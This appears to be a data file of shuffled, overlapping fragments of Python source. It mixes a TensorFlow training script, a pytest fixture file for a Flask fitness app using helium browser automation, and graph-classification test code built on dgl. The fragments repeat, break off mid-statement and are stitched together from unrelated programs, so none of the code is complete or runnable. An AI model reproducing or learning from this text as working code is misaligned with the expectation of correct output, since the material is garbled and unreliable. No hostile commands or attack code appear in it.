'Sample size is : ',sample_num del(yInTemp)", "= tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32) # L2_in = tf.matmul(L1_out, W2) + b2 L2_out", "= tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary = tf.summary.scalar(\"training accuracy\", train_accuracy) opt", "dtype=tf.float32) L1_in = tf.matmul(x, W1) + b1 #L1_out = tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in)", "import numpy as np import random import gc data_dim = 200#输入数据的维度 # piece", "num), 'bias1', dtype=tf.float32) # b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) L1_in = 
tf.matmul(x,", "# sample_num = piece * 49 xInTemp, yInTemp = readerX.genAllXY() yInTemp = [[i,1", "cnt < 2000 and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1,", "yIn[:sample_num].reshape((-1, 2))}) _, loss_val, W_val = sess.run([train_op, loss, W3], feed_dict={x: xSam.reshape(-1, data_dim), y:", "tf.contrib.losses.mean_squared_error(L1_out, y) loss = -tf.reduce_sum(y * tf.log(Lf_out)) # loss = tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\")", "shape = (None, 2)) num = 30 num2 = 20 print num, num2", "loss_val print accu print accu_test # print W_val if accu > 0.99: print", "= readerX.genAllXY() yInTemp = [[i,1 - i] for i in yInTemp] print 'Reader", "xIn[:sample_num], # y: yIn[:sample_num].reshape((-1, 2))}) _, loss_val, W_val = sess.run([train_op, loss, W3], feed_dict={x:", "print 'Matrix Prepared' x = tf.placeholder(tf.float32, shape = (None, data_dim)) y = tf.placeholder(tf.float32,", "0 or( cnt < 2000 and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num],", "y) loss = -tf.reduce_sum(y * tf.log(Lf_out)) # loss = tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as", "2)) num = 30 num2 = 20 print num, num2 with tf.variable_scope(\"Ez_flat\"): W1", "b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) L1_in = tf.matmul(x, W1) + b1 #L1_out", "or( cnt < 2000 and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! 
accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num], y:", "print 'Reader Done' xIn = np.matrix(xInTemp) yIn = np.matrix(yInTemp) sample_num = len(yIn) -", "tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32) b2 = tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32) # L2_in =", "'weight2', dtype=tf.float32) b2 = tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32) # L2_in = tf.matmul(L1_out, W2)", "= np.matrix(xInTemp) yIn = np.matrix(yInTemp) sample_num = len(yIn) - 1000 print 'Sample size", "Start' sess.run(tf.global_variables_initializer()) for cnt in xrange(100000000): randList = np.random.randint(0,sample_num, size=(1,200)) # inputSam =", "ySam.reshape(-1, 2)}) if cnt%1000 == 0 or( cnt < 2000 and cnt%100 ==", "= random.sample(inputLong,577) # print inputSam xSam = xIn[randList, :] ySam = yIn[randList, :]", "* tf.log(Lf_out)) # loss = tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1),", "xSam.reshape(-1, data_dim), y: ySam.reshape(-1, 2)}) if cnt%1000 == 0 or( cnt < 2000", "print 'cnt', cnt print loss_val print accu print accu_test # print W_val if", "y: yIn[:sample_num].reshape((-1, 2))}) accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))}) # print W1_val", "tf.nn.sigmoid(L1_in) # W2 = tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32) b2 = tf.Variable(np.random.rand(1, num2), 'bias2',", "tensorflow as tf import numpy as np import random import gc data_dim =", "tf.summary.scalar(\"training accuracy\", train_accuracy) opt = tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss) with tf.Session() as sess:", "200#输入数据的维度 # piece = 999999 # sample_num = piece * 49 xInTemp, yInTemp", "= sess.run([train_op, loss, W3], # feed_dict={x: xIn[:sample_num], # y: yIn[:sample_num].reshape((-1, 2))}) _, loss_val,", "# print W_val if accu > 0.99: print '#' * 20 print accu", "dtype=tf.float32) 
b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) # b1 = tf.Variable(np.random.rand(1, num), 'bias1',", "yInTemp = readerX.genAllXY() yInTemp = [[i,1 - i] for i in yInTemp] print", "0):#!!!!!!!!!!!在这里!!!!!!!! accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))}) accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:], y:", "as scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary = tf.summary.scalar(\"training", "b2 L2_out = tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32) # b3 =", "# loss = tf.contrib.losses.mean_squared_error(L1_out, y) # loss = tf.contrib.losses.mean_squared_error(L1_out, y) loss = -tf.reduce_sum(y", "accu > 0.99: print '#' * 20 print accu print accu_test print cnt", "dtype=tf.float32) # b3 = tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32) Lf_in = tf.matmul(L2_out, W3) Lf_out", "train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))}) # print W1_val print '#' * 20 print", "randList = np.random.randint(0,sample_num, size=(1,200)) # inputSam = random.sample(inputLong,577) # print inputSam xSam =", "= tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction,", "tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary = tf.summary.scalar(\"training accuracy\", train_accuracy) opt = tf.train.AdamOptimizer(0.01)", "= 999999 # sample_num = piece * 49 xInTemp, yInTemp = readerX.genAllXY() yInTemp", "tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) L1_in = tf.matmul(x, W1) + b1 #L1_out = tf.nn.softmax(L1_in)", "gc.collect() print 'Matrix Prepared' x = tf.placeholder(tf.float32, 
shape = (None, data_dim)) y =", "49 xInTemp, yInTemp = readerX.genAllXY() yInTemp = [[i,1 - i] for i in", "'cnt', cnt print loss_val print accu print accu_test # print W_val if accu", "print W1_val print '#' * 20 print 'cnt', cnt print loss_val print accu", "print accu_test # print W_val if accu > 0.99: print '#' * 20", "Lf_in = tf.matmul(L2_out, W3) Lf_out = tf.nn.softmax(Lf_in) # rst = L2_out * 50", "# y: yIn[:sample_num].reshape((-1, 2))}) _, loss_val, W_val = sess.run([train_op, loss, W3], feed_dict={x: xSam.reshape(-1,", "W_val = sess.run([train_op, loss, W3], # feed_dict={x: xIn[:sample_num], # y: yIn[:sample_num].reshape((-1, 2))}) _," ]
[ "SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED = False @pytest.fixture def driver_home(): driver = start_firefox(HOME_PAGE, headless=True)", "ctx = app.app_context() ctx.push() yield testing_client ctx.pop() @pytest.fixture(scope=\"module\") def init_database(): # Create the", "\"https://www.strengthlog.app/\" class TestConfig(Config): TESTING = True BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED", "import create_app, db from strength_log.config import Config from helium import start_firefox, kill_browser, click,", "headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\") yield driver kill_browser() @pytest.fixture(scope=\"module\") def new_user():", "into=\"Password\") click(\"Submit\") yield driver kill_browser() @pytest.fixture(scope=\"module\") def new_user(): user = User(\"<EMAIL>\", \"strengthlog\") return", "User from strength_log import create_app, db from strength_log.config import Config from helium import", "= False @pytest.fixture def driver_home(): driver = start_firefox(HOME_PAGE, headless=True) yield driver kill_browser() @pytest.fixture", "= start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\") yield driver kill_browser() @pytest.fixture(scope=\"module\")", "def test_client(): app = create_app(config_class=TestConfig) testing_client = app.test_client() ctx = app.app_context() ctx.push() yield", "@pytest.fixture def driver_login(): driver = start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\")", "data user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) # Commit", "write import pytest HOME_PAGE = \"https://www.strengthlog.app/\" class 
TestConfig(Config): TESTING = True BCRYPT_LOG_ROUNDS =", "test_client(): app = create_app(config_class=TestConfig) testing_client = app.test_client() ctx = app.app_context() ctx.push() yield testing_client", "from strength_log.config import Config from helium import start_firefox, kill_browser, click, Link, write import", "app.app_context() ctx.push() yield testing_client ctx.pop() @pytest.fixture(scope=\"module\") def init_database(): # Create the database and", "new_user(): user = User(\"<EMAIL>\", \"strengthlog\") return user @pytest.fixture(scope=\"module\") def test_client(): app = create_app(config_class=TestConfig)", "app.test_client() ctx = app.app_context() ctx.push() yield testing_client ctx.pop() @pytest.fixture(scope=\"module\") def init_database(): # Create", "db.session.add(user1) db.session.add(user2) # Commit changes db.session.commit() yield db # Testing happpens here db.drop_all()", "user = User(\"<EMAIL>\", \"strengthlog\") return user @pytest.fixture(scope=\"module\") def test_client(): app = create_app(config_class=TestConfig) testing_client", "driver = start_firefox(HOME_PAGE, headless=True) yield driver kill_browser() @pytest.fixture def driver_login(): driver = start_firefox(HOME_PAGE,", "strength_log.models import User from strength_log import create_app, db from strength_log.config import Config from", "write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\") yield driver kill_browser() @pytest.fixture(scope=\"module\") def new_user(): user =", "Insert user data user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2)", "User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) # Commit changes db.session.commit() yield", "# Create the database and tables db.create_all() # Insert user data user1 =", "def new_user(): 
user = User(\"<EMAIL>\", \"strengthlog\") return user @pytest.fixture(scope=\"module\") def test_client(): app =", "class TestConfig(Config): TESTING = True BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED =", "def init_database(): # Create the database and tables db.create_all() # Insert user data", "init_database(): # Create the database and tables db.create_all() # Insert user data user1", "TESTING = True BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED = False @pytest.fixture", "= \"sqlite://\" WTF_CSRF_ENABLED = False @pytest.fixture def driver_home(): driver = start_firefox(HOME_PAGE, headless=True) yield", "driver_home(): driver = start_firefox(HOME_PAGE, headless=True) yield driver kill_browser() @pytest.fixture def driver_login(): driver =", "Link, write import pytest HOME_PAGE = \"https://www.strengthlog.app/\" class TestConfig(Config): TESTING = True BCRYPT_LOG_ROUNDS", "HOME_PAGE = \"https://www.strengthlog.app/\" class TestConfig(Config): TESTING = True BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI =", "kill_browser() @pytest.fixture def driver_login(): driver = start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\")", "testing_client ctx.pop() @pytest.fixture(scope=\"module\") def init_database(): # Create the database and tables db.create_all() #", "import Config from helium import start_firefox, kill_browser, click, Link, write import pytest HOME_PAGE", "db.create_all() # Insert user data user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\")", "<filename>tests/conftest.py<gh_stars>1-10 from strength_log.models import User from strength_log import create_app, db from strength_log.config import", "user data user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) 
db.session.add(user2) #", "= User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) # Commit changes db.session.commit() yield db # Testing", "User(\"<EMAIL>\", \"strengthlog\") return user @pytest.fixture(scope=\"module\") def test_client(): app = create_app(config_class=TestConfig) testing_client = app.test_client()", "headless=True) yield driver kill_browser() @pytest.fixture def driver_login(): driver = start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\",", "= create_app(config_class=TestConfig) testing_client = app.test_client() ctx = app.app_context() ctx.push() yield testing_client ctx.pop() @pytest.fixture(scope=\"module\")", "yield driver kill_browser() @pytest.fixture def driver_login(): driver = start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\")", "click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\") yield driver kill_browser() @pytest.fixture(scope=\"module\") def new_user(): user", "Config from helium import start_firefox, kill_browser, click, Link, write import pytest HOME_PAGE =", "the database and tables db.create_all() # Insert user data user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\")", "password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) # Commit changes db.session.commit() yield db", "from strength_log.models import User from strength_log import create_app, db from strength_log.config import Config", "start_firefox(HOME_PAGE, headless=True) yield driver kill_browser() @pytest.fixture def driver_login(): driver = start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\"))", "return user @pytest.fixture(scope=\"module\") def test_client(): app = create_app(config_class=TestConfig) testing_client = app.test_client() ctx =", "True BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI = \"sqlite://\" 
WTF_CSRF_ENABLED = False @pytest.fixture def driver_home():", "tables db.create_all() # Insert user data user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\",", "from helium import start_firefox, kill_browser, click, Link, write import pytest HOME_PAGE = \"https://www.strengthlog.app/\"", "TestConfig(Config): TESTING = True BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED = False", "@pytest.fixture def driver_home(): driver = start_firefox(HOME_PAGE, headless=True) yield driver kill_browser() @pytest.fixture def driver_login():", "driver kill_browser() @pytest.fixture def driver_login(): driver = start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\",", "= start_firefox(HOME_PAGE, headless=True) yield driver kill_browser() @pytest.fixture def driver_login(): driver = start_firefox(HOME_PAGE, headless=True)", "Create the database and tables db.create_all() # Insert user data user1 = User(email=\"<EMAIL>\",", "def driver_home(): driver = start_firefox(HOME_PAGE, headless=True) yield driver kill_browser() @pytest.fixture def driver_login(): driver", "= app.test_client() ctx = app.app_context() ctx.push() yield testing_client ctx.pop() @pytest.fixture(scope=\"module\") def init_database(): #", "= \"https://www.strengthlog.app/\" class TestConfig(Config): TESTING = True BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI = \"sqlite://\"", "import pytest HOME_PAGE = \"https://www.strengthlog.app/\" class TestConfig(Config): TESTING = True BCRYPT_LOG_ROUNDS = 4", "User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) # Commit changes db.session.commit() yield db # Testing happpens", "import User from strength_log import create_app, db from strength_log.config import Config from helium", "strength_log import create_app, db from strength_log.config import Config from helium import start_firefox, kill_browser,", "helium 
import start_firefox, kill_browser, click, Link, write import pytest HOME_PAGE = \"https://www.strengthlog.app/\" class", "into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\") yield driver kill_browser() @pytest.fixture(scope=\"module\") def new_user(): user = User(\"<EMAIL>\",", "from strength_log import create_app, db from strength_log.config import Config from helium import start_firefox,", "start_firefox, kill_browser, click, Link, write import pytest HOME_PAGE = \"https://www.strengthlog.app/\" class TestConfig(Config): TESTING", "database and tables db.create_all() # Insert user data user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2", "user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) # Commit changes", "kill_browser, click, Link, write import pytest HOME_PAGE = \"https://www.strengthlog.app/\" class TestConfig(Config): TESTING =", "ctx.push() yield testing_client ctx.pop() @pytest.fixture(scope=\"module\") def init_database(): # Create the database and tables", "app = create_app(config_class=TestConfig) testing_client = app.test_client() ctx = app.app_context() ctx.push() yield testing_client ctx.pop()", "4 SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED = False @pytest.fixture def driver_home(): driver = start_firefox(HOME_PAGE,", "testing_client = app.test_client() ctx = app.app_context() ctx.push() yield testing_client ctx.pop() @pytest.fixture(scope=\"module\") def init_database():", "@pytest.fixture(scope=\"module\") def test_client(): app = create_app(config_class=TestConfig) testing_client = app.test_client() ctx = app.app_context() ctx.push()", "click(\"Submit\") yield driver kill_browser() @pytest.fixture(scope=\"module\") def new_user(): user = User(\"<EMAIL>\", \"strengthlog\") return user", "@pytest.fixture(scope=\"module\") def init_database(): # Create the database and tables db.create_all() # Insert 
user", "= True BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED = False @pytest.fixture def", "False @pytest.fixture def driver_home(): driver = start_firefox(HOME_PAGE, headless=True) yield driver kill_browser() @pytest.fixture def", "password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) # Commit changes db.session.commit() yield db # Testing happpens here", "strength_log.config import Config from helium import start_firefox, kill_browser, click, Link, write import pytest", "user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) # Commit changes db.session.commit() yield db #", "create_app(config_class=TestConfig) testing_client = app.test_client() ctx = app.app_context() ctx.push() yield testing_client ctx.pop() @pytest.fixture(scope=\"module\") def", "start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\") yield driver kill_browser() @pytest.fixture(scope=\"module\") def", "= app.app_context() ctx.push() yield testing_client ctx.pop() @pytest.fixture(scope=\"module\") def init_database(): # Create the database", "db from strength_log.config import Config from helium import start_firefox, kill_browser, click, Link, write", "import start_firefox, kill_browser, click, Link, write import pytest HOME_PAGE = \"https://www.strengthlog.app/\" class TestConfig(Config):", "kill_browser() @pytest.fixture(scope=\"module\") def new_user(): user = User(\"<EMAIL>\", \"strengthlog\") return user @pytest.fixture(scope=\"module\") def test_client():", "= User(\"<EMAIL>\", \"strengthlog\") return user @pytest.fixture(scope=\"module\") def test_client(): app = create_app(config_class=TestConfig) testing_client =", "click, Link, write import pytest HOME_PAGE = \"https://www.strengthlog.app/\" class TestConfig(Config): TESTING = True", "\"strengthlog\") return user @pytest.fixture(scope=\"module\") 
def test_client(): app = create_app(config_class=TestConfig) testing_client = app.test_client() ctx", "yield driver kill_browser() @pytest.fixture(scope=\"module\") def new_user(): user = User(\"<EMAIL>\", \"strengthlog\") return user @pytest.fixture(scope=\"module\")", "pytest HOME_PAGE = \"https://www.strengthlog.app/\" class TestConfig(Config): TESTING = True BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI", "yield testing_client ctx.pop() @pytest.fixture(scope=\"module\") def init_database(): # Create the database and tables db.create_all()", "create_app, db from strength_log.config import Config from helium import start_firefox, kill_browser, click, Link,", "\"sqlite://\" WTF_CSRF_ENABLED = False @pytest.fixture def driver_home(): driver = start_firefox(HOME_PAGE, headless=True) yield driver", "driver_login(): driver = start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\") yield driver", "and tables db.create_all() # Insert user data user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 =", "ctx.pop() @pytest.fixture(scope=\"module\") def init_database(): # Create the database and tables db.create_all() # Insert", "def driver_login(): driver = start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\") yield", "@pytest.fixture(scope=\"module\") def new_user(): user = User(\"<EMAIL>\", \"strengthlog\") return user @pytest.fixture(scope=\"module\") def test_client(): app", "= User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) # Commit changes db.session.commit()", "driver = start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\") yield driver kill_browser()", "= 4 
SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED = False @pytest.fixture def driver_home(): driver =", "BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED = False @pytest.fixture def driver_home(): driver", "write(\"test\", into=\"Password\") click(\"Submit\") yield driver kill_browser() @pytest.fixture(scope=\"module\") def new_user(): user = User(\"<EMAIL>\", \"strengthlog\")", "user @pytest.fixture(scope=\"module\") def test_client(): app = create_app(config_class=TestConfig) testing_client = app.test_client() ctx = app.app_context()", "driver kill_browser() @pytest.fixture(scope=\"module\") def new_user(): user = User(\"<EMAIL>\", \"strengthlog\") return user @pytest.fixture(scope=\"module\") def", "WTF_CSRF_ENABLED = False @pytest.fixture def driver_home(): driver = start_firefox(HOME_PAGE, headless=True) yield driver kill_browser()", "# Insert user data user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1)" ]
[ "criterion = criterion.cuda() start_epoch = 0 best_map = 0 early_stop_counter = 0 if", "loss.contrastive import ContrastiveLoss, TripletLoss import dgl __author__ = \"<NAME>\" __email__ = \"<EMAIL>\" def", "target_query combined_dist_matrix = dist_matrix else: print('* Test No combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query)))", "# Check cuda & Set random seed args.cuda = args.ngpu > 0 and", "import ContrastiveLoss, TripletLoss import dgl __author__ = \"<NAME>\" __email__ = \"<EMAIL>\" def test(data_loader,", "kw in enumerate(target_combined_query): ind = kw == target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values # K-NN", "meanap = LogMetric.AverageMeter() net, distance = nets # switch to test mode net.eval()", "= checkpoint['best_map'] print('Loaded model at epoch {epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader,", "Set random seed args.cuda = args.ngpu > 0 and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if", "# mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('* Test Acc {acc.avg:.3f}; mAP {meanap.avg:", "if args.cuda: torch.cuda.manual_seed(args.seed) # Check Test and Load if args.load is None: raise", "mAP {meanap.avg: .5f} Time x Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time)) return acc, meanap", "Check Test and Load if args.load is None: raise Exception('Cannot test without loading", "TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap, dist=True) else: args.triplet=False criterion", "dist_matrix.shape[1]) for i, kw in enumerate(target_combined_query): ind = kw == target_query combined_dist_matrix[i] =", 
"np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) # Check Test and Load if args.load is", "TESTED**') net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda: print('\\t* CUDA') net, distNet = net.cuda(),", "# Own modules from options import Options from Logger import LogMetric from utils", "{b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time)) return acc, meanap def main(): print('Loss & Optimizer') if", "g: g.gdata['std'], g_gallery)) g_gallery = dgl.batch(g_gallery) g_gallery.gdata = {'std': torch.cat(gdata)} target_query = []", "and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader, [net, distNet], args.cuda) if __name__ == '__main__':", "i, kw in enumerate(target_combined_query): ind = kw == target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values #", "# Output g = net(g) d = distance(g, g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix", "print('Loss & Optimizer') if args.loss=='triplet': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True", "early_stop_counter = 0 if args.load is not None: print('Loading model') checkpoint = load_checkpoint(args.load)", "print('\\t* CUDA') net, distNet = net.cuda(), distNet.cuda() criterion = criterion.cuda() start_epoch = 0", "= list(map(lambda g: g.gdata['std'], g_gallery)) g_gallery = dgl.batch(g_gallery) g_gallery.gdata = {'std': torch.cat(gdata)} target_query", "from models import models, distance from data.load_data import load_data from loss.contrastive import ContrastiveLoss,", "g = net(g) target_gallery.append(target) g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery)) gdata = list(map(lambda g: g.gdata['std'],", "division \"\"\" Graph classification \"\"\" # Python modules 
import torch import glob import", "import Options from Logger import LogMetric from utils import load_checkpoint, knn_accuracy, mean_average_precision from", "if args.cuda and args.ngpu > 1: print('\\t* Data Parallel **NOT TESTED**') net =", "np.array(np.concatenate(target_gallery)) gdata = list(map(lambda g: g.gdata['std'], g_gallery)) g_gallery = dgl.batch(g_gallery) g_gallery.gdata = {'std':", "LogMetric.AverageMeter() net, distance = nets # switch to test mode net.eval() distance.eval() end", "[] for j, (g, target) in enumerate(gallery_loader): if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda()", "dist_matrix else: print('* Test No combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query = np.unique(target_query)", "= args.ngpu > 0 and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) # Check", "print('Parameters:\\t' + str(args)) # Check cuda & Set random seed args.cuda = args.ngpu", "net, distance = nets # switch to test mode net.eval() distance.eval() end =", "= checkpoint['epoch'] best_map = checkpoint['best_map'] print('Loaded model at epoch {epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map']))", "= TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap, dist=True) else: args.triplet=False", "str(args)) # Check cuda & Set random seed args.cuda = args.ngpu > 0", "Logger import LogMetric from utils import load_checkpoint, knn_accuracy, mean_average_precision from models import models,", "time.time() dist_matrix = [] start = time.time() with torch.no_grad(): g_gallery = [] target_gallery", "= net.cuda(), distNet.cuda() criterion = criterion.cuda() start_epoch = 0 best_map = 0 early_stop_counter", "checkpoint['best_map'] print('Loaded model at epoch {epoch} and 
mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader, [net,", "mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix = torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query)) if validation: target_combined_query =", "= 0 if args.load is not None: print('Loading model') checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict'])", "args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap, dist=True)", "enumerate(data_loader): # Prepare input data if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output", "triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create model') net = models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet", "net = models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet = distance.SoftHd() print('Check CUDA') if", "target) in enumerate(data_loader): # Prepare input data if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda()", "= LogMetric.AverageMeter() net, distance = nets # switch to test mode net.eval() distance.eval()", "torch.cuda.manual_seed(args.seed) # Check Test and Load if args.load is None: raise Exception('Cannot test", "g_gallery = dgl.batch(g_gallery) g_gallery.gdata = {'std': torch.cat(gdata)} target_query = [] for i, (g,", "k=5)) # mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('* Test Acc {acc.avg:.3f}; mAP", "numpy as np import time import os # Own modules from options import", "distNet], args.cuda) if __name__ == '__main__': # Parse options args = Options().parse() 
